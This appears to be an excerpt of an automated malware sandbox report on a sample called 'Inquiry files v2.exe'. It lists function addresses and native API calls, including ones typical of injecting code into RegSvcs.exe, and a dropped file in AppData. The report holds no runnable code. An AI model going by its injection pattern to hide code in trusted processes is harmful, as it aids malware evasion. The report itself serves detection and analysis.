                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012F2AB0 NtWaitForSingleObject,7_2_012F2AB0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012F2AF0 NtWriteFile,7_2_012F2AF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012F2AD0 NtReadFile,7_2_012F2AD0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012F2D30 NtUnmapViewOfSection,7_2_012F2D30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012F2D00 NtSetInformationFile,7_2_012F2D00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012F2D10 NtMapViewOfSection,7_2_012F2D10
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012F2DB0 NtEnumerateKey,7_2_012F2DB0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012F2DD0 NtDelayExecution,7_2_012F2DD0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012F2C00 NtQueryInformationProcess,7_2_012F2C00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012F2C60 NtCreateKey,7_2_012F2C60
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012F2CA0 NtQueryInformationToken,7_2_012F2CA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012F2CF0 NtOpenProcess,7_2_012F2CF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012F2CC0 NtQueryVirtualMemory,7_2_012F2CC0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012F2F30 NtCreateSection,7_2_012F2F30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012F2F60 NtCreateProcessEx,7_2_012F2F60
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012F2FA0 NtQuerySection,7_2_012F2FA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012F2FB0 NtResumeThread,7_2_012F2FB0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012F2F90 NtProtectVirtualMemory,7_2_012F2F90
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012F2FE0 NtCreateFile,7_2_012F2FE0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012F2E30 NtWriteVirtualMemory,7_2_012F2E30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012F2EA0 NtAdjustPrivilegesToken,7_2_012F2EA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012F2E80 NtReadVirtualMemory,7_2_012F2E80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012F2EE0 NtQueueApcThread,7_2_012F2EE0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012F3010 NtOpenDirectoryObject,7_2_012F3010
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012F3090 NtSetValueKey,7_2_012F3090
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012F39B0 NtGetContextThread,7_2_012F39B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012F3D10 NtOpenProcessToken,7_2_012F3D10
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012F3D70 NtOpenThread,7_2_012F3D70
                Source: C:\Users\user\Desktop\Inquiry files v2.exeCode function: 0_2_0141D5BC0_2_0141D5BC
                Source: C:\Users\user\Desktop\Inquiry files v2.exeCode function: 0_2_0613CCD00_2_0613CCD0
                Source: C:\Users\user\Desktop\Inquiry files v2.exeCode function: 0_2_0613CCC00_2_0613CCC0
                Source: C:\Users\user\Desktop\Inquiry files v2.exeCode function: 0_2_076DC1A80_2_076DC1A8
                Source: C:\Users\user\Desktop\Inquiry files v2.exeCode function: 0_2_076D2D700_2_076D2D70
                Source: C:\Users\user\Desktop\Inquiry files v2.exeCode function: 0_2_076DD9BF0_2_076DD9BF
                Source: C:\Users\user\Desktop\Inquiry files v2.exeCode function: 0_2_076DF7380_2_076DF738
                Source: C:\Users\user\Desktop\Inquiry files v2.exeCode function: 0_2_076D82D80_2_076D82D8
                Source: C:\Users\user\Desktop\Inquiry files v2.exeCode function: 0_2_076D62800_2_076D6280
                Source: C:\Users\user\Desktop\Inquiry files v2.exeCode function: 0_2_076D5E480_2_076D5E48
                Source: C:\Users\user\Desktop\Inquiry files v2.exeCode function: 0_2_076D2D610_2_076D2D61
                Source: C:\Users\user\Desktop\Inquiry files v2.exeCode function: 0_2_076D5A100_2_076D5A10
                Source: C:\Users\user\Desktop\Inquiry files v2.exeCode function: 0_2_076D79280_2_076D7928
                Source: C:\Users\user\Desktop\Inquiry files v2.exeCode function: 0_2_07E75EA00_2_07E75EA0
                Source: C:\Users\user\Desktop\Inquiry files v2.exeCode function: 0_2_07E7DEC80_2_07E7DEC8
                Source: C:\Users\user\Desktop\Inquiry files v2.exeCode function: 0_2_07E7DEB90_2_07E7DEB9
                Source: C:\Users\user\Desktop\Inquiry files v2.exeCode function: 0_2_07E75E920_2_07E75E92
                Source: C:\Users\user\Desktop\Inquiry files v2.exeCode function: 0_2_07E75C400_2_07E75C40
                Source: C:\Users\user\Desktop\Inquiry files v2.exeCode function: 0_2_07E75C300_2_07E75C30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_004030207_2_00403020
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0041699E7_2_0041699E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_004169A37_2_004169A3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00402AEC7_2_00402AEC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_004044457_2_00404445
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0042E4637_2_0042E463
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0040FC037_2_0040FC03
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0040FE237_2_0040FE23
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0040DEA37_2_0040DEA3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012B01007_2_012B0100
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0135A1187_2_0135A118
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_013481587_2_01348158
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_013801AA7_2_013801AA
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_013741A27_2_013741A2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_013781CC7_2_013781CC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_013520007_2_01352000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0137A3527_2_0137A352
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012CE3F07_2_012CE3F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_013803E67_2_013803E6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_013602747_2_01360274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_013402C07_2_013402C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012C05357_2_012C0535
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_013805917_2_01380591
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_013644207_2_01364420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_013724467_2_01372446
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0136E4F67_2_0136E4F6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012C07707_2_012C0770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012E47507_2_012E4750
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012BC7C07_2_012BC7C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012DC6E07_2_012DC6E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012D69627_2_012D6962
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012C29A07_2_012C29A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0138A9A67_2_0138A9A6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012CA8407_2_012CA840
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012C28407_2_012C2840
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012A68B87_2_012A68B8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012EE8F07_2_012EE8F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0137AB407_2_0137AB40
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01376BD77_2_01376BD7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012BEA807_2_012BEA80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0135CD1F7_2_0135CD1F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012CAD007_2_012CAD00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012D8DBF7_2_012D8DBF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012BADE07_2_012BADE0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012C0C007_2_012C0C00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01360CB57_2_01360CB5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012B0CF27_2_012B0CF2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01362F307_2_01362F30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01302F287_2_01302F28
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012E0F307_2_012E0F30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01334F407_2_01334F40
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0133EFA07_2_0133EFA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012CCFE07_2_012CCFE0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012B2FC87_2_012B2FC8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0137EE267_2_0137EE26
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012C0E597_2_012C0E59
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0137CE937_2_0137CE93
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012D2E907_2_012D2E90
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0137EEDB7_2_0137EEDB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012F516C7_2_012F516C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0138B16B7_2_0138B16B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012AF1727_2_012AF172
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012CB1B07_2_012CB1B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0137F0E07_2_0137F0E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_013770E97_2_013770E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012C70C07_2_012C70C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0136F0CC7_2_0136F0CC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0137132D7_2_0137132D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012AD34C7_2_012AD34C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0130739A7_2_0130739A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012C52A07_2_012C52A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_013612ED7_2_013612ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012DB2C07_2_012DB2C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_013775717_2_01377571
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0135D5B07_2_0135D5B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_013895C37_2_013895C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0137F43F7_2_0137F43F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012B14607_2_012B1460
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0137F7B07_2_0137F7B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_013056307_2_01305630
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_013716CC7_2_013716CC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_013559107_2_01355910
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012C99507_2_012C9950
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012DB9507_2_012DB950
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0132D8007_2_0132D800
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012C38E07_2_012C38E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0137FB767_2_0137FB76
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012DFB807_2_012DFB80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01335BF07_2_01335BF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012FDBF97_2_012FDBF9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01333A6C7_2_01333A6C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01377A467_2_01377A46
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0137FA497_2_0137FA49
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01305AA07_2_01305AA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01361AA37_2_01361AA3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0135DAAC7_2_0135DAAC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0136DAC67_2_0136DAC6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01377D737_2_01377D73
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012C3D407_2_012C3D40
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01371D5A7_2_01371D5A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012DFDC07_2_012DFDC0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01339C327_2_01339C32
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0137FCF27_2_0137FCF2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0137FF097_2_0137FF09
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0137FFB17_2_0137FFB1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012C1F927_2_012C1F92
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01283FD27_2_01283FD2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01283FD57_2_01283FD5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012C9EB07_2_012C9EB0
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exeCode function: 9_2_00884B019_2_00884B01
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exeCode function: 9_2_0088D5BC9_2_0088D5BC
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exeCode function: 9_2_06BE5EA09_2_06BE5EA0
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exeCode function: 9_2_06BEDEB99_2_06BEDEB9
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exeCode function: 9_2_06BEDEC89_2_06BEDEC8
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exeCode function: 9_2_06BE5C309_2_06BE5C30
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exeCode function: 9_2_06BE5C409_2_06BE5C40
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exeCode function: 9_2_06FC37379_2_06FC3737
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exeCode function: 9_2_06FCB4499_2_06FCB449
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exeCode function: 9_2_06FC2D709_2_06FC2D70
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exeCode function: 9_2_06FCCBAD9_2_06FCCBAD
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exeCode function: 9_2_06FC82D89_2_06FC82D8
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exeCode function: 9_2_06FC62809_2_06FC6280
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exeCode function: 9_2_06FC5E489_2_06FC5E48
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exeCode function: 9_2_06FC2D619_2_06FC2D61
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exeCode function: 9_2_06FC5A109_2_06FC5A10
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exeCode function: 9_2_06FCE9D89_2_06FCE9D8
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exeCode function: 9_2_06FC79289_2_06FC7928
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exeCode function: 9_2_0702CCD09_2_0702CCD0
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exeCode function: 9_2_0702CCC09_2_0702CCC0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_016E010013_2_016E0100
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_0173600013_2_01736000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_017702C013_2_017702C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_016F053513_2_016F0535
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_016F077013_2_016F0770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_0171475013_2_01714750
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_016EC7C013_2_016EC7C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_0170C6E013_2_0170C6E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_0170696213_2_01706962
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_016F29A013_2_016F29A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_016F284013_2_016F2840
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_016FA84013_2_016FA840
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_0171E8F013_2_0171E8F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_016D68B813_2_016D68B8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_0172889013_2_01728890
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_016EEA8013_2_016EEA80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_016FED7A13_2_016FED7A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_016FAD0013_2_016FAD00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_016EADE013_2_016EADE0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_016F8DC013_2_016F8DC0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_01708DBF13_2_01708DBF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_016F0C0013_2_016F0C00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_016E0CF213_2_016E0CF2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_01764F4013_2_01764F40
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_01710F3013_2_01710F30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_01732F2813_2_01732F28
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_016E2FC813_2_016E2FC8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_0176EFA013_2_0176EFA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_016F0E5913_2_016F0E59
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_01702E9013_2_01702E90
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_0172516C13_2_0172516C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_016DF17213_2_016DF172
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_016FB1B013_2_016FB1B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_016DD34C13_2_016DD34C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_016F33F313_2_016F33F3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_0170D2F013_2_0170D2F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_0170B2C013_2_0170B2C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_016F52A013_2_016F52A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_016E146013_2_016E1460
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_017374E013_2_017374E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_016F349713_2_016F3497
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_016FB73013_2_016FB730
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_0170B95013_2_0170B950
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_016F995013_2_016F9950
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_016F599013_2_016F5990
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_0175D80013_2_0175D800
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_016F38E013_2_016F38E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_01765BF013_2_01765BF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_0172DBF913_2_0172DBF9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_0170FB8013_2_0170FB80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_01763A6C13_2_01763A6C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_016F3D4013_2_016F3D40
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_0170FDC013_2_0170FDC0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_01769C3213_2_01769C32
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_01709C2013_2_01709C20
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_016F1F9213_2_016F1F92
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_016F9EB013_2_016F9EB0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 012F5130 appears 58 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 01307E54 appears 111 times
